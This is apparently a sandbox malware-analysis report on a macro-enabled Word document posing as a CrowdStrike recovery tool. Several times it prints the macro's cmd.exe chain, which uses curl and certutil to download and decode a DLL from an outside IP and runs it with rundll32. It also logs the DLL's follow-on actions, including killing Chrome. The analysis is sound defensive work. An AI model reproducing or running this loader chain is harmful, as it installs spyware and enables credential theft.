Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function MainFunc, API IWshShell3.Run("C:\Windows\System32\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit",0:Integer,False)
Source: ~WRC0000.tmp.26.dr | OLE, VBA macro line: JbxHook_Run_3__ob = jbxthis.Run(jbxparam0, jbxparam1, jbxparam2)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm | OLE, VBA macro line: ' Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm | OLE, VBA macro line: ' Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm | OLE, VBA macro line: dir = Environ("temp")
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm | OLE, VBA macro line: pp = pp + "tem32\cmd.exe /c "
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm | OLE, VBA macro line: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm | OLE, VBA macro line: 'pp = pp + "cmd.exe -d & exit"
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm | OLE, VBA macro line: Set objShell = CreateObject("WScript.Shell")
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function MainFunc, String environ: dir = Environ("temp")
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function MainFunc, String cmd.exe: pp = pp + "tem32\cmd.exe /c "
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function MainFunc, String rundll32: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function MainFunc, String wscript: Set objShell = CreateObject("WScript.Shell")
Source: ~WRC0000.tmp.26.dr | OLE, VBA macro line: pp = pp + "tem32\cmd.exe /c "
Source: ~WRC0000.tmp.26.dr | OLE, VBA macro line: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File dump: C:\Users\user\Downloads\MsftRecoveryToolForCSv2.zip (copy)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\rundll32.exe | File deleted: C:\Windows\Temp\SGlzdG9yeQ==
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_00871535
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_0089A8D8
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_0087A9B3
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_0088C1FD
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_0086E127
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_008ACAA0
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_0087FAEC
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_008B33B0
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_00874415
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_008825B8
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C19250
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C95204
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C291B0
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92BF5730
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C9B7E0
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C95A60
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C2F940
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92BF18C0
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92CAFA20
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C99CA0
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92BEFE10
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92BF6120
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C1A0A0
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92BF2210
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92BEEAA0
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92BF2E60
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92BEED05
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92BF0DA0
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C231D0
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C25170
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92BF5160
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C1B190
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C496B0
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C515E0
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C09960
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C2BCB0
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C23DE0
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92BFE330
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92BEE140
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C5E0B0
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C32080
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C96250
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C3C160
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92BFE710
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C3A7E0
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C947A0
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C747C0
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92BFE520
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C04540
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C36460
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C64B30
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92BF4BC0
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C96B6E
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92BFE900
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C00860
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C16A00
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C64CF0
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C66E50
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C96E10
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C94D80
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 33_2_00841535
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 33_2_0086A8D8
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 33_2_0084A9B3
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 33_2_0085C1FD
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 33_2_0083E127
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 33_2_0087CAA0
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 33_2_0084FAEC
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 33_2_008833B0
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 33_2_00844415
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 33_2_008525B8
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm | OLE, VBA macro line: Sub Document_Open()
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function Document_Open
Source: ~WRC0000.tmp.26.dr | OLE, VBA macro line: Sub Document_Open()
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm | OLE indicator, VBA macros: true
Source: harvardanglia2008officeonline.xsl.0.dr | OLE indicator, VBA macros: true
Source: mlaseventheditionofficeonline.xsl.0.dr | OLE indicator, VBA macros: true
Source: turabian.xsl.0.dr | OLE indicator, VBA macros: true
Source: ieee2006officeonline.xsl.0.dr | OLE indicator, VBA macros: true
Source: gostname.xsl.0.dr | OLE indicator, VBA macros: true
Source: APASixthEditionOfficeOnline.xsl.0.dr | OLE indicator, VBA macros: true
Source: sist02.xsl.0.dr | OLE indicator, VBA macros: true
Source: iso690nmerical.xsl.0.dr | OLE indicator, VBA macros: true
Source: gb.xsl.0.dr | OLE indicator, VBA macros: true
Source: iso690.xsl.0.dr | OLE indicator, VBA macros: true
Source: chicago.xsl.0.dr | OLE indicator, VBA macros: true
Source: gosttitle.xsl.0.dr | OLE indicator, VBA macros: true
Source: CatalogCacheMetaData.xml.26.dr | OLE indicator, VBA macros: true
Source: ~WRC0000.tmp.26.dr | OLE indicator, VBA macros: true
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm | Stream path 'VBA/__SRP_0' : http://172.104.160.126:8099\curl.txt\curl.exe/payload2.txt\mscorsvc.txt\mscorsvc.dllC:\Windows\Sys"tem32\cmd.exe /c$-encode$\cu-decode"$ -o$del&rl.exe &.bq.aSTART( rundll32&,DllMainexit
Source: harvardanglia2008officeonline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: mlaseventheditionofficeonline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{43F4B375-8E7A-44EF-86E3-6C5BC465D1F2}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: turabian.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ieee2006officeonline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: gostname.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: APASixthEditionOfficeOnline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: sist02.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: iso690nmerical.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: gb.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: iso690.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: chicago.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: gosttitle.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: CatalogCacheMetaData.xml.26.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C915E0 appears 132 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C26F90 appears 415 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C15F20 appears 56 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C2B840 appears 35 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C20ED0 appears 71 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C15810 appears 68 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C97390 appears 35 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92BEAA50 appears 36 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C27080 appears 332 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C90F70 appears 42 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C15FF0 appears 35 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C91110 appears 87 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C91570 appears 266 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C157A0 appears 36 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92CABF00 appears 47 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C127F0 appears 47 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C90FF0 appears 434 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 0084201D appears 39 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 0087201D appears 39 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 0084D632 appears 246 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 0083913E appears 64 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 00842564 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 008720E6 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 0084D6AD appears 303 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 0087251E appears 48 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 0084251E appears 48 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 0087D6AD appears 303 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 0086913E appears 64 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 008420E6 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 0087D632 appears 247 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 00872564 appears 48 times
Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOCM@69/284@2/4
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_0086310D CreateToolhelp32Snapshot,GetLastError,CloseHandle,Module32First,Module32Next,
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\OfficeJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1428:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2496:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6304:120:WilError_03
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{EDECE918-A2EA-49DC-A414-445477A4F37D} - OProcSessId.datJump to behavior
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE indicator, Word Document stream: true
Source: Element design set.dotx.0.drOLE indicator, Word Document stream: true
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drOLE indicator, Word Document stream: true
Source: Equations.dotx.0.drOLE indicator, Word Document stream: true
Source: Insight design set.dotx.0.drOLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.0.drOLE indicator, Word Document stream: true
Source: ~WRC0000.tmp.26.drOLE indicator, Word Document stream: true
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE document summary: title field not present or empty
Source: ~WRF{43F4B375-8E7A-44EF-86E3-6C5BC465D1F2}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{43F4B375-8E7A-44EF-86E3-6C5BC465D1F2}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{43F4B375-8E7A-44EF-86E3-6C5BC465D1F2}.tmp.0.drOLE document summary: edited time not present or 0
Source: ~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.drOLE document summary: title field not present or empty
Source: ~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.drOLE document summary: author field not present or empty
Source: ~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.drOLE document summary: edited time not present or 0
Source: ~WRC0000.tmp.26.drOLE document summary: title field not present or empty
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;chrome.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;chrome.exe&quot;)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: rundll32.exe, 00000010.00000002.5553191262.0000020A7832A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.5553191262.0000020A7835E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000003.2777616664.0000027F6C3A9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4258973771.0000027F6C3A9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4258973771.0000027F6C366000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000003.2777450961.0000027F6C3A9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000003.2778177784.0000027F6C3A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmReversingLabs: Detection: 26%
Source: curl.exeString found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exeString found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1976,i,14189460158267219968,9438605418759963760,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://go.microsoft.com/fwlink/?linkid=2280386"
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
